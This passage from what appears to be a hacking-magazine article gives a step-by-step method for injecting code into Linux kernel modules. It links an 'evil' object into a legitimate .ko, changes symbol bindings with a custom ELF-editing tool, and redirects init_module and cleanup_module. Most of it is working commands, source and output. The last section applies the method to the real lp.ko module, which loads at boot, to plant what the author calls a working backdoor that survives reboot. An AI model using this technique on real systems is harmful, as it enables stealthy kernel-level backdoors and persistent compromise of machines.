printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/******************************** EOF ************************************/
|
|
|
|
/***************************** evil.c ************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
int evil(void) {
|
|
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
Once the two modules orig.ko and evil.ko are compiled, they can be linked
|
|
together using the 'ld -r' command (as explained by truff) because they are
|
|
both relocatable objects.
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko
|
|
|
|
new.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
The evil() function has now been linked into the new.ko module. The next
|
|
step is to make init_module() (defined in orig.ko) an alias of evil()
|
|
(defined in evil.ko). It can be done easily using ./elfchger:
|
|
|
|
$ ./elfchger -f init_module -v 00000040 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x954
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x97c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xbe4
|
|
>> Index in symbol table: 0x1d
|
|
[+] Replacing 0x00000020 with 0x00000040... done!
|
|
|
|
At this point the module can be renamed and loaded:
|
|
|
|
$ mv new.ko orig.ko
|
|
$ sudo insmod orig.ko
|
|
$ dmesg | tail
|
|
...
|
|
[ 6791.920363] Init Inject!
|
|
|
|
And the magic occurs :)
|
|
|
|
As already explained by truff, if we want the original module to work
|
|
properly, we need to call its initialization function. This can be done
|
|
using an imported symbol which will be fixed at linking time. The init()
|
|
function is declared as extern: this means that it will be resolved at
|
|
linking time. We use the following code:
|
|
|
|
/****************************** evil.c ***********************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int init();
|
|
|
|
int evil(void) {
|
|
|
|
init();
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
/* do something */
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
And it works:
|
|
|
|
$ dmesg | tail
|
|
...
|
|
[ 7910.392244] Init Original!
|
|
[ 7910.392248] Init Inject!
|
|
|
|
|
|
---[ 4 - Real World: Is it so simple?
|
|
|
|
|
|
In this section it will be shown why the method described above when used
|
|
in real life may not work. In fact the example modules were overly
|
|
simplified for a better understanding of the basic idea of module
|
|
infection.
|
|
|
|
|
|
---[ 4.1 - Static functions
|
|
|
|
|
|
The majority of Linux system modules are a little bit different from those
|
|
used above. Here is a more accurate example:
|
|
|
|
/***************************** orig.c ************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
static int init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
static void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/******************************** EOF ************************************/
|
|
|
|
Let's try to use our method to inject the old evil code inside this new
|
|
orig module.
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ sudo insmod new.ko
|
|
insmod: error inserting 'new.ko': -1 Unknown symbol in module
|
|
|
|
What? More information is needed:
|
|
|
|
$ dmesg | tail
|
|
...
|
|
[ 2737.539906] orig: Unknown symbol init (err 0)
|
|
|
|
The unknown symbol appears to be init. To understand the reason why init is
|
|
"unknown" let's have a look at the symbol table of new.ko:
|
|
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
SYMBOL TABLE:
|
|
...
|
|
|
|
00000000 l F .text 00000019 clean
|
|
00000020 l F .text 0000001b init
|
|
|
|
...
|
|
|
|
00000040 g F .text 00000020 evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000000 *UND* 00000000 init
|
|
|
|
This output shows that there are now two "init" symbols, one of them not
|
|
being defined (*UND*). This means that the linker does not perform
|
|
correctly the linking between the init functions in orig.ko and evil.ko. As
|
|
a result, when the module is loaded, the kernel tries to find the init
|
|
symbol, but since it is not defined anywhere it fails to do so and the
|
|
module is not loaded.
|
|
|
|
|
|
---[ 4.1.1 - Local symbol
|
|
|
|
The 'readelf' tool can give us more insight:
|
|
|
|
$ readelf -s orig.ko
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
...
|
|
14: 00000020 27 FUNC LOCAL DEFAULT 2 init
|
|
...
|
|
|
|
To summarize, we know about the init symbol that:
|
|
|
|
- its relative address is 0x00000020;
|
|
- its type is a function;
|
|
- its binding is local;
|
|
|
|
The symbol binding is now local (while it was previously global) since the
|
|
init function is now declared 'static' in orig.c. This has the effect to
|
|
reduce its scope to the file in which it is declared. For this reason the
|
|
symbol was not properly resolved by the linker. We need to do something in
|
|
order to change the scope of init, otherwise the injection won't work.
|
|
|
|
|
|
---[ 4.1.2 - Changing symbol binding
|
|
|
|
|
|
It's possible to change a symbol binding using the 'objcopy' tool. In fact
|
|
the '--globalize-symbol' option can be used to give global scoping to the
|
|
specified symbol:
|
|
|
|
$ objcopy --globalize-symbol=init ./orig.ko orig2.ko
|
|
|
|
But if for some reason, objcopy is not present, the tool that I wrote can
|
|
also globalize a particular symbol modifying all the necessary fields
|
|
inside the ELF file.
|
|
|
|
Each symbol table entry in the .symtab section is defined as follows [2]:
|
|
|
|
/******************************** EOF ************************************/
|
|
typedef struct
|
|
{
|
|
Elf32_Word st_name; /* Symbol name (string tbl index) */
|
|
Elf32_Addr st_value; /* Symbol value */
|
|
Elf32_Word st_size; /* Symbol size */
|
|
unsigned char st_info; /* Symbol type and binding */
|
|
unsigned char st_other; /* Symbol visibility */
|
|
Elf32_Section st_shndx; /* Section index */
|
|
} Elf32_Sym;
|
|
/******************************** EOF ************************************/
|
|
|
|
First, it's necessary to find in the ELF file the symbol we are looking for
|
|
(init) and check if it has a global or a local binding. The function
|
|
ElfGetSymbolByName() searches the offset at which init symbol is located in
|
|
the .symtab and it fills the corresponding "Elf32_Sym sym" structure.
|
|
Next, the binding type must be checked by looking at the st_info field.
|
|
Passing sym.st_info to the macro ELF32_ST_BIND() defined in "<elf.h>",
|
|
returns the expected binding value.
|
|
|
|
If the symbol has a local binding, these steps have to be performed:
|
|
|
|
1. Reorder the symbols: the symbol we are interested in must be placed
|
|
among the global symbols inside the .symtab section. We'll see later why
|
|
this step is mandatory. We need to move the init symbol from:
|
|
|
|
$ readelf -s orig.ko
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
|
|
1: 00000000 0 SECTION LOCAL DEFAULT 1
|
|
2: 00000000 0 SECTION LOCAL DEFAULT 2
|
|
3: 00000000 0 SECTION LOCAL DEFAULT 4
|
|
4: 00000000 0 SECTION LOCAL DEFAULT 5
|
|
5: 00000000 0 SECTION LOCAL DEFAULT 6
|
|
6: 00000000 0 SECTION LOCAL DEFAULT 8
|
|
7: 00000000 0 SECTION LOCAL DEFAULT 9
|
|
8: 00000000 0 SECTION LOCAL DEFAULT 10
|
|
9: 00000000 0 SECTION LOCAL DEFAULT 12
|
|
10: 00000000 0 SECTION LOCAL DEFAULT 13
|
|
11: 00000000 0 SECTION LOCAL DEFAULT 14
|
|
12: 00000000 0 FILE LOCAL DEFAULT ABS orig.c
|
|
13: 00000000 25 FUNC LOCAL DEFAULT 2 clean
|
|
|
|
14: 00000020 27 FUNC LOCAL DEFAULT 2 init <-----
|
|
|
|
15: 00000000 12 OBJECT LOCAL DEFAULT 5 __mod_license6
|
|
16: 00000000 0 FILE LOCAL DEFAULT ABS orig.mod.c
|
|
17: 00000020 35 OBJECT LOCAL DEFAULT 5 __mod_srcversion31
|
|
18: 00000043 9 OBJECT LOCAL DEFAULT 5 __module_depends
|
|
19: 00000000 192 OBJECT LOCAL DEFAULT 8 ____versions
|
|
20: 00000060 59 OBJECT LOCAL DEFAULT 5 __mod_vermagic5
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
22: 00000000 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
23: 00000020 27 FUNC GLOBAL DEFAULT 2 init_module
|
|
24: 00000000 0 NOTYPE GLOBAL DEFAULT UND mcount
|
|
25: 00000000 0 NOTYPE GLOBAL DEFAULT UND printk
|
|
|
|
To:
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
|
|
1: 00000000 0 SECTION LOCAL DEFAULT 1
|
|
2: 00000000 0 SECTION LOCAL DEFAULT 2
|
|
3: 00000000 0 SECTION LOCAL DEFAULT 4
|
|
4: 00000000 0 SECTION LOCAL DEFAULT 5
|
|
5: 00000000 0 SECTION LOCAL DEFAULT 6
|
|
6: 00000000 0 SECTION LOCAL DEFAULT 8
|
|
7: 00000000 0 SECTION LOCAL DEFAULT 9
|
|
8: 00000000 0 SECTION LOCAL DEFAULT 10
|
|
9: 00000000 0 SECTION LOCAL DEFAULT 12
|
|
10: 00000000 0 SECTION LOCAL DEFAULT 13
|
|
11: 00000000 0 SECTION LOCAL DEFAULT 14
|
|
12: 00000000 0 FILE LOCAL DEFAULT ABS orig.c
|
|
13: 00000000 25 FUNC LOCAL DEFAULT 2 clean
|
|
14: 00000000 12 OBJECT LOCAL DEFAULT 5 __mod_license6
|
|
15: 00000000 0 FILE LOCAL DEFAULT ABS orig.mod.c
|
|
16: 00000020 35 OBJECT LOCAL DEFAULT 5 __mod_srcversion31
|
|
17: 00000043 9 OBJECT LOCAL DEFAULT 5 __module_depends
|
|
18: 00000000 192 OBJECT LOCAL DEFAULT 8 ____versions
|
|
19: 00000060 59 OBJECT LOCAL DEFAULT 5 __mod_vermagic5
|
|
|
|
20: 00000020 27 FUNC GLOBAL DEFAULT 2 init <-----
|
|
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
22: 00000000 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
23: 00000020 27 FUNC GLOBAL DEFAULT 2 init_module
|
|
24: 00000000 0 NOTYPE GLOBAL DEFAULT UND mcount
|
|
25: 00000000 0 NOTYPE GLOBAL DEFAULT UND printk
|
|
|
|
This task is accomplished by the "ReorderSymbols()" function.
|
|
|
|
2. Updating the information about the init symbol (i.e. its offset, index,
|
|
etc..) according to its new position inside the .symtab section.
|
|
|
|
3. Changing the symbol binding from local to global by modifying the
|
|
st_info field using the ELF32_ST_INFO macro:
|
|
|
|
#define ELF32_ST_INFO(b, t) (((b)<<4)+((t)&0xf))
|
|
|
|
Where 'b' is the symbol binding and 't' the symbol type.
|
|
The binding values are:
|
|
|
|
Name Value
|
|
==== =====
|
|
STB_LOCAL 0
|
|
STB_GLOBAL 1
|
|
STB_WEAK 2
|
|
STB_LOPROC 13
|
|
STB_HIPROC 15
|
|
|
|
Obviously, STB_GLOBAL has to be used for our purpose.
|
|
|
|
The type values are:
|
|
|
|
Name Value
|
|
==== =====
|
|
STT_NOTYPE 0
|
|
STT_OBJECT 1
|
|
STT_FUNC 2
|
|
STT_SECTION 3
|
|
STT_FILE 4
|
|
STT_LOPROC 13
|
|
STT_HIPROC 15
|
|
|
|
The STT_FUNC is the type value to specify functions.
|
|
|
|
So, the resulting macro will be:
|
|
|
|
ELF32_ST_INFO(STB_GLOBAL, STT_FUNC);
|
|
|
|
The init st_info field should then be set equal to the macro's result.
|
|
|
|
4. Updating the symtab section header, defined as:
|
|
|
|
typedef struct {
|
|
Elf32_Word sh_name;
|
|
Elf32_Word sh_type;
|
|
Elf32_Word sh_flags;
|
|
Elf32_Addr sh_addr;
|
|
Elf32_Off sh_offset;
|
|
Elf32_Word sh_size;
|
|
Elf32_Word sh_link;
|
|
Elf32_Word sh_info;
|
|
Elf32_Word sh_addralign;
|
|
Elf32_Word sh_entsize;
|
|
} Elf32_Shdr;
|
|
|
|
The header can be output by the 'readelf -e' command:
|
|
|
|
$ readelf -e orig.ko
|
|
|
|
ELF Header:
|
|
|
|
...
|
|
|
|
Section Headers:
|
|
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
...
|
|
[15] .shstrtab STRTAB 00000000 00040c 0000ae 00 0 0 1
|
|
[16] .symtab SYMTAB 00000000 0007dc 0001a0 10 17 21 4
|
|
[17] .strtab STRTAB 00000000 00097c 0000a5 00 0 0 1
|
|
|
|
The value of the information (sh_info) field (reported as 'Inf')
|
|
depends on the section header type (sh_type):
|
|
|
|
sh_type sh_link sh_info
|
|
======= ======= =======
|
|
SHT_DYNAMIC The section header index of 0
|
|
the string table used by
|
|
entries in the section.
|
|
SHT_HASH The section header index of 0
|
|
the symbol table to which the
|
|
hash table applies.
|
|
SHT_REL, The section header index of The section header index of
|
|
SHT_RELA the associated symbol table. the section to which the
|
|
relocation applies.
|
|
SHT_SYMTAB, The section header index of One greater than the symbol
|
|
SHT_DYNSYM the associated string table. table index of the last
|
|
local symbol (binding
|
|
STB_LOCAL).
|
|
other SHN_UNDEF 0
|
|
|
|
The sh_info must be updated according to the rules of the SHT_SYMTAB
|
|
type. In our example, its value will be 20 = 19 + 1 (remember that our
|
|
symbol will be placed after the "__mod_vermagic5" symbol, whose entry
|
|
number is 19). This is the reason why reorder the symbol list (step 1)
|
|
is a necessary step.
|
|
|
|
All these tasks are accomplished by the tool I wrote by using this option:
|
|
|
|
./elfchger -g [symbol] <module_name>
|
|
|
|
Where [symbol] is the symbol name which binding value has to be modified.
|
|
|
|
|
|
---[ 4.1.3 Try again
|
|
|
|
|
|
At this point we can try another test, in which the developed tool will be
|
|
used. The two modules (orig.c and evil.c) and the Makefile remain the same.
|
|
|
|
The first step is to change the init binding from 'local' to 'global'. The
|
|
outcome of the elfchger script can be checked by looking at the readelf's
|
|
output before and after its use. Before running the script readelf outputs:
|
|
|
|
$ readelf -a orig.ko
|
|
|
|
...
|
|
|
|
Section Headers:
|
|
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
...
|
|
[16] .symtab SYMTAB 00000000 0007dc 0001a0 10 17 21 4
|
|
|
|
...
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
...
|
|
10: 00000000 0 SECTION LOCAL DEFAULT 13
|
|
11: 00000000 0 SECTION LOCAL DEFAULT 14
|
|
12: 00000000 0 FILE LOCAL DEFAULT ABS orig.c
|
|
13: 00000000 25 FUNC LOCAL DEFAULT 2 clean
|
|
14: 00000020 27 FUNC LOCAL DEFAULT 2 init
|
|
...
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
22: 00000000 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
...
|
|
|
|
Let's run the script on the orig.ko file:
|
|
|
|
$ ./elfchger -g init orig.ko
|
|
[+] Opening orig.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x73c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x764
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x8bc
|
|
>> Index in symbol table: 0xe
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from f to e
|
|
>> Moving symbol from 10 to f
|
|
>> Moving symbol from 11 to 10
|
|
>> Moving symbol from 12 to 11
|
|
>> Moving symbol from 13 to 12
|
|
>> Moving symbol from 14 to 13
|
|
>> Moving our symbol from 14 to 14
|
|
>> Last LOCAL symbol: 0x14
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0x91c
|
|
>> Index in symbol table: 0x14
|
|
>> Replacing flag 'LOCAL' located at 0x928 with 'GLOBAL'
|
|
[+] Updating symtab infos at 0x73c
|
|
|
|
Let's see what happened:
|
|
|
|
$ readelf -a orig.ko
|
|
|
|
...
|
|
|
|
Section Headers:
|
|
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
...
|
|
[16] .symtab SYMTAB 00000000 0007dc 0001a0 10 17 20 4
|
|
[17] .strtab STRTAB 00000000 00097c 0000a5 00 0 0 1
|
|
|
|
...
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
...
|
|
18: 00000000 192 OBJECT LOCAL DEFAULT 8 ____versions
|
|
19: 00000060 59 OBJECT LOCAL DEFAULT 5 __mod_vermagic5
|
|
20: 00000020 27 FUNC GLOBAL DEFAULT 2 init
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
...
|
|
|
|
So as expected:
|
|
|
|
- the position of init is changed from 14 to 20 in the symbol table;
|
|
- the 'Inf' field in the .symtab header has changed: its current value is
|
|
20 (19 (last index local symbol) + 1);
|
|
- the binding of init has changed from local to global.
|
|
|
|
Now we can link together orig.ko and evil.ko:
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
00000040 g F .text 00000020 evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
We can notice that the init symbol is no more *UND*. The final step is to
|
|
modify the value of init_module:
|
|
|
|
$ ./elfchger -s init_module -v 00000040 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x954
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x97c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xbfc
|
|
>> Index in symbol table: 0x1e
|
|
[+] Replacing 0x00000020 with 0x00000040... done!
|
|
|
|
Let's try to load module:
|
|
|
|
$ mv new.ko orig.ko
|
|
$ sudo insmod orig.ko
|
|
$ dmesg|tail
|
|
...
|
|
[ 2385.342838] Init Original!
|
|
[ 2385.342845] Init Inject!
|
|
|
|
Cool!! It works!
|
|
|
|
|
|
---[ 4.2 Static __init init functions
|
|
|
|
|
|
In the previous section it was demonstrated how to inject modules when the
|
|
init function is declared as static. However in some cases the startup
|
|
function in the kernel modules is defined with the __init macro:
|
|
|
|
static int __init function_name();
|
|
|
|
The __init macro is used to describe the function as only being required
|
|
during initialisation time. Once initialisation has been performed, the
|
|
kernel will remove this function and release the corresponding memory.
|
|
|
|
The __init macro is defined in "include/linux/init.h":
|
|
|
|
/*************************************************************************/
|
|
#define __init __section(.init.text) __cold notrace
|
|
/*************************************************************************/
|
|
|
|
The __section macro is defined in "include/linux/compiler.h":
|
|
|
|
/*************************************************************************/
|
|
#define __section(S) __attribute__ ((__section__(#S)))
|
|
/*************************************************************************/
|
|
|
|
While __cold macro is defined in "/include/linux/compiler-gcc*.h":
|
|
|
|
/*************************************************************************/
|
|
#define __cold __attribute__((__cold__))
|
|
/*************************************************************************/
|
|
|
|
When the __init macro is used, a number of GCC attributes are added to the
|
|
function declaration. The __cold attribute informs the compiler to optimize
|
|
it for size instead of speed, because it'll be rarely used. The __section
|
|
attribute informs the compiler to put the text for this function in a new
|
|
section named ".init.text" [5]. How these __init functions are called can
|
|
be checked in "kernel/module.c":
|
|
|
|
/*************************************************************************/
|
|
static void __init do_initcalls(void)
|
|
{
|
|
initcall_t *fn;
|
|
|
|
for (fn = __early_initcall_end; fn < __initcall_end; fn++)
|
|
do_one_initcall(*fn);
|
|
|
|
/* Make sure there is no pending stuff from the initcall sequence */
|
|
flush_scheduled_work();
|
|
}
|
|
|
|
/*************************************************************************/
|
|
|
|
For each step of the loop inside the do_initcalls() function, an __init
|
|
function set up by the module_init macro is executed. The injection will
|
|
work even if the function is declared with __init.
|
|
|
|
The module orig is as follows:
|
|
|
|
/******************************** orig.c *********************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
static int __init init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
static void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/******************************** EOF ************************************/
|
|
|
|
After the compilation and as expected, a new .init.text section has
|
|
appeared:
|
|
|
|
$ objdump -t orig.ko
|
|
...
|
|
00000000 l F .init.text 00000016 init
|
|
00000000 l O .modinfo 0000000c __mod_license6
|
|
00000000 l df *ABS* 00000000 orig.mod.c
|
|
00000020 l O .modinfo 00000023 __mod_srcversion31
|
|
00000043 l O .modinfo 00000009 __module_depends
|
|
00000000 l O __versions 000000c0 ____versions
|
|
00000060 l O .modinfo 0000003b __mod_vermagic5
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000000 g F .init.text 00000016 init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
|
|
Both init and init_module symbols are part of the .init.text section. This
|
|
new issue can be solved by defining the evil() function as __init:
|
|
|
|
/******************************** evil.c *********************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int __init init();
|
|
|
|
int __init evil(void) {
|
|
|
|
init();
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
/* does something */
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
Both init() and evil() are prefixed with __init because we need them in
|
|
the same section. The same steps described in section 4.1.3 are then
|
|
performed:
|
|
|
|
1 - Change the init binding:
|
|
|
|
$ ./elfchger -g init orig.ko
|
|
[+] Opening orig.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x77c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x7a4
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x8fc
|
|
>> Index in symbol table: 0xf
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from 10 to f
|
|
>> Moving symbol from 11 to 10
|
|
>> Moving symbol from 12 to 11
|
|
>> Moving symbol from 13 to 12
|
|
>> Moving symbol from 14 to 13
|
|
>> Moving symbol from 15 to 14
|
|
>> Moving our symbol from 15 to 15
|
|
>> Last LOCAL symbol: 0x15
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
[>> Symbol found at 0x95c
|
|
>> Index in symbol table: 0x15
|
|
>> Replacing flag 'LOCAL' located at 0x968 with 'GLOBAL'
|
|
[+] Updating symtab infos at 0x77c
|
|
|
|
|
|
2 - Link the modules together:
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
00000016 g F .init.text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000000 g F .init.text 00000016 init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000000 g F .init.text 00000016 init
|
|
|
|
|
|
3 - Change init_module address:
|
|
|
|
$ ./elfchger -s init_module -v 00000016 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x954
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x97c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xbec
|
|
>> Index in symbol table: 0x1f
|
|
[+] Replacing 0x00000000 with 0x00000016... done!
|
|
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
00000016 g F .init.text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000016 g F .init.text 00000016 init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000000 g F .init.text 00000016 init
|
|
|
|
|
|
4 - Load the module in memory:
|
|
|
|
$ mv new.ko orig.ko
|
|
$ sudo insmod orig.ko
|
|
$ dmesg|tail
|
|
...
|
|
[ 323.085545] Init Original!
|
|
[ 323.085553] Init Inject!
|
|
|
|
As expected, it works!
|
|
|
|
|
|
---[ 4.3 - What about cleanup_module
|
|
|
|
|
|
These methods work fine with the cleanup_module symbol which is called by
|
|
the kernel when the module is unloaded. Never forget to deal with the
|
|
termination function as well because if you don't and if the infected
|
|
module was removed for some reason then your kernel would most likely crash
|
|
(because there would now be invalid references to the module).
|
|
|
|
The module exit function can be injected simply by altering the symbol
|
|
whose name is specified in elfchger:
|
|
|
|
$ ./elfchger -s cleanup_module -v address_evil_fn new.ko
|
|
|
|
In this way, when the module is unloaded, the evil() function will be
|
|
invoked instead of the clean() one. You may also need to deal with binding
|
|
issues and __exit attribute but the adaptation of the previous method is
|
|
straightforward.
|
|
|
|
|
|
---[ 5 - Real life example
|
|
|
|
|
|
This chapter will show the usage of the present method in a real life
|
|
example. Let's suppose that evil.ko is a working backdoor. We want to
|
|
inject it into a kernel module not used by any other kernel module. This
|
|
test was done on Ubuntu 11.10 (x86) with a 3.0.0 kernel.
|
|
|
|
$ uname -a
|
|
Linux ubuntu 3.0.0-15-generic #26-Ubuntu SMP Fri Jan 20 15:59:53 UTC 2012
|
|
i686 i686 i386 GNU/Linux
|
|
|
|
Let's begin by checking which modules to infect by using the lsmod command:
|
|
|
|
$ lsmod
|
|
|
|
Module Size Used by
|
|
serio_raw 4022 0
|
|
lp 7342 0
|
|
snd_seq_midi 4588 0
|
|
usbhid 36882 0
|
|
binfmt_misc 6599 1
|
|
agpgart 32011 1 drm
|
|
snd_intel8x0 25632 2
|
|
|
|
...
|
|
|
|
libahci 21667 3 ahci
|
|
|
|
The command output shows that some of the modules are not used by any
|
|
other module. These modules can be unloaded safely and then they can be
|
|
infected with our backdoor using the method presented above. This chapter
|
|
is divided into two sections in which I'll describe two techniques to load
|
|
the module when the operating system is booted:
|
|
|
|
1 - Infect a kernel module (or simply add a new one) on
|
|
/etc/modprobe.preload (Fedora, etc.) or in /etc/modules on
|
|
Debian/Ubuntu.
|
|
|
|
2 - Backdoor initrd.
|
|
|
|
|
|
---[ 5.1 - Infecting a kernel module in /etc/modules
|
|
|
|
First of all, we have to know which modules are in the /etc/modules file:
|
|
|
|
$ cat /etc/modules
|
|
# /etc/modules: kernel modules to load at boot time.
|
|
...
|
|
lp
|
|
|
|
As described in the previous section, this module (lp.ko) can be unloaded
|
|
safely and then infected with our backdoor.
|
|
|
|
$ find / -name lp.ko
|
|
...
|
|
/lib/modules/3.0.0-15-generic/kernel/drivers/char/lp.ko
|
|
...
|
|
|
|
$ cd /lib/modules/3.0.0-15-generic/kernel/drivers/char
|
|
|
|
Next, we check which function is called by the init_module:
|
|
|
|
$ objdump -t lp.ko |grep -e ".init.text"
|
|
00000000 l F .init.text 00000175 lp_init
|
|
00000175 l F .init.text 000000ae lp_init_module
|
|
00000000 l d .init.text 00000000 .init.text
|
|
00000175 g F .init.text 000000ae init_module
|
|
|
|
We want to infect the lp_init_module() function, so the evil module will
|
|
be coded in the following way:
|
|
|
|
/****************** evil.c ***********************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int __init lp_init_module();
|
|
|
|
int __init evil(void) {
|
|
|
|
printk(KERN_ALERT "Init Inject! Lp");
|
|
lp_init_module();
|
|
|
|
/* does something */
|
|
|
|
return 0;
|
|
}
|
|
/****************** EOF **************************************************/
|
|
|
|
Since the lp_init_module function is static we need to change its binding
|
|
type to global.
|
|
|
|
$ ./elfchger -g lp_init_module lp.ko
|
|
[+] Opening lp.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x28a0
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x28c8
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x2b30
|
|
>> Index in symbol table: 0x24
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from 25 to 24
|
|
>> Moving symbol from 26 to 25
|
|
>> Moving symbol from 27 to 26
|
|
